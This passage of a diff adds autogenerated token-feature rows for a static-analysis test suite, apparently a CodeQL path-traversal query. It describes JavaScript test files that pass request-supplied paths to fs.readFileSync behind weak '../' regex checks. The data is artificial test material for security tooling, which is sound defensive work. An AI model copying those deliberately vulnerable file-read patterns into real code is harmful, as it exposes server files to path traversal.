express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:399:5:399:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:399:8:399:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:399:8:399:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:399:8:399:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:399:8:399:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:399:8:399:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:399:21:399:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:399:21:399:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:399:21:399:24 | path | calleeImports | fs | @@ -9759,6 +79723,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:399:21:399:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:399:21:399:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:399:21:399:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:401:7:401:36 | !path.m ... \\.\\\\)/) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:401:7:401:36 | !path.m ... \\.\\\\)/) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:401:7:401:36 | !path.m ... \\.\\\\)/) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:401:7:401:36 | !path.m ... \\.\\\\)/) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:401:7:401:36 | !path.m ... \\.\\\\)/) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:11 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:11 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:11 | path | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:11 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:11 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:17 | path.match | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:17 | path.match | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:17 | path.match | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:17 | path.match | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:17 | path.match | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:36 | exceptional return of path.ma ... \\.\\\\)/) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:36 | exceptional return of path.ma ... \\.\\\\)/) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:36 | exceptional return of path.ma ... \\.\\\\)/) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:36 | exceptional return of path.ma ... \\.\\\\)/) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:36 | exceptional return of path.ma ... \\.\\\\)/) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:36 | path.ma ... \\.\\\\)/) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:36 | path.ma ... \\.\\\\)/) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:36 | path.ma ... \\.\\\\)/) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:36 | path.ma ... \\.\\\\)/) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:401:8:401:36 | path.ma ... \\.\\\\)/) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:401:13:401:17 | match | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:401:13:401:17 | match | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:401:13:401:17 | match | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:401:13:401:17 | match | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:401:13:401:17 | match | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:401:19:401:35 | /(\\.\\.\\/\|\\.\\.\\\\)/ | CalleeFlexibleAccessPath | path.match | | autogenerated/TaintedPath/normalizedPaths.js:401:19:401:35 | /(\\.\\.\\/\|\\.\\.\\\\)/ | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:401:19:401:35 | /(\\.\\.\\/\|\\.\\.\\\\)/ | calleeImports | path | @@ -9768,6 +79762,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:401:19:401:35 | /(\\.\\.\\/\|\\.\\.\\\\)/ | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:401:19:401:35 | /(\\.\\.\\/\|\\.\\.\\\\)/ | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:401:19:401:35 | /(\\.\\.\\/\|\\.\\.\\\\)/ | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:402:5:402:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:402:8:402:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:402:8:402:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:402:8:402:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query x pathModule isAbsolute path fs readFileSync path path match /\\./ fs readFileSync path path match /\\.\\./ fs readFileSync path path match /\\.\\.\\// fs readFileSync path path match /\\.\\.\\/foo/ fs readFileSync path path match /(\\.\\.\\/\|\\.\\.\\\\)/ fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:402:8:402:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:402:8:402:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:402:21:402:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:402:21:402:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:402:21:402:24 | path | calleeImports | fs | @@ -9777,42 +79796,260 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:402:21:402:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:402:21:402:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:402:21:402:24 | path | receiverName | fs | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:0 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:0 | this | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:0 | this | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | asyncFS | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | asyncFS | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | asyncFS | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | fs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | fsExtra | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | fsExtra | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | fsExtra | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | getFsModule | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | getFsModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | getFsModule | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | gracefulFs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | gracefulFs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | gracefulFs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | mkdirp | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | mkdirp | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | mkdirp | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | originalFs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | originalFs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | originalFs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | url | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | util | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | util | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:1:1:1 | util | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:5:1:8 | http | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:5:1:8 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:5:1:8 | http | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:5:1:26 | http | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:5:1:26 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:5:1:26 | http | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:5:1:26 | http = ... "http") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:5:1:26 | http = ... "http") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:5:1:26 | http = ... "http") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:12:1:18 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:12:1:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:12:1:18 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:12:1:26 | exceptional return of require("http") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:12:1:26 | exceptional return of require("http") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:12:1:26 | exceptional return of require("http") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:1:12:1:26 | require("http") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:1:12:1:26 | require("http") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:1:12:1:26 | require("http") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:1:20:1:25 | "http" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:1:20:1:25 | "http" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:1:20:1:25 | "http" | calleeImports | | | autogenerated/TaintedPath/other-fs-libraries.js:1:20:1:25 | "http" | contextFunctionInterfaces | getFsModule(special) | | autogenerated/TaintedPath/other-fs-libraries.js:1:20:1:25 | "http" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/other-fs-libraries.js:1:20:1:25 | "http" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:2:3:2:5 | url | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:2:3:2:5 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:2:3:2:5 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:2:3:2:5 | url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:2:3:2:22 | url | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:2:3:2:22 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:2:3:2:22 | url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:2:3:2:22 | url = require("url") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:2:3:2:22 | url = require("url") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:2:3:2:22 | url = require("url") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:2:9:2:15 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:2:9:2:15 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:2:9:2:15 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:2:9:2:22 | exceptional return of require("url") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:2:9:2:22 | exceptional return of require("url") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:2:9:2:22 | exceptional return of require("url") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:2:9:2:22 | require("url") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:2:9:2:22 | require("url") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:2:9:2:22 | require("url") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:2:17:2:21 | "url" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:2:17:2:21 | "url" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:2:17:2:21 | "url" | calleeImports | | | autogenerated/TaintedPath/other-fs-libraries.js:2:17:2:21 | "url" | contextFunctionInterfaces | getFsModule(special) | | autogenerated/TaintedPath/other-fs-libraries.js:2:17:2:21 | "url" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/other-fs-libraries.js:2:17:2:21 | "url" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:3:3:3:4 | fs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:3:3:3:4 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:3:3:3:4 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:3:3:3:4 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:3:3:3:20 | fs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:3:3:3:20 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:3:3:3:20 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:3:3:3:20 | fs = require("fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:3:3:3:20 | fs = require("fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:3:3:3:20 | fs = require("fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:3:8:3:14 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:3:8:3:14 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:3:8:3:14 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:3:8:3:20 | exceptional return of require("fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:3:8:3:20 | exceptional return of require("fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:3:8:3:20 | exceptional return of require("fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:3:8:3:20 | require("fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:3:8:3:20 | require("fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:3:8:3:20 | require("fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:3:16:3:19 | "fs" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:3:16:3:19 | "fs" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:3:16:3:19 | "fs" | calleeImports | | | autogenerated/TaintedPath/other-fs-libraries.js:3:16:3:19 | "fs" | 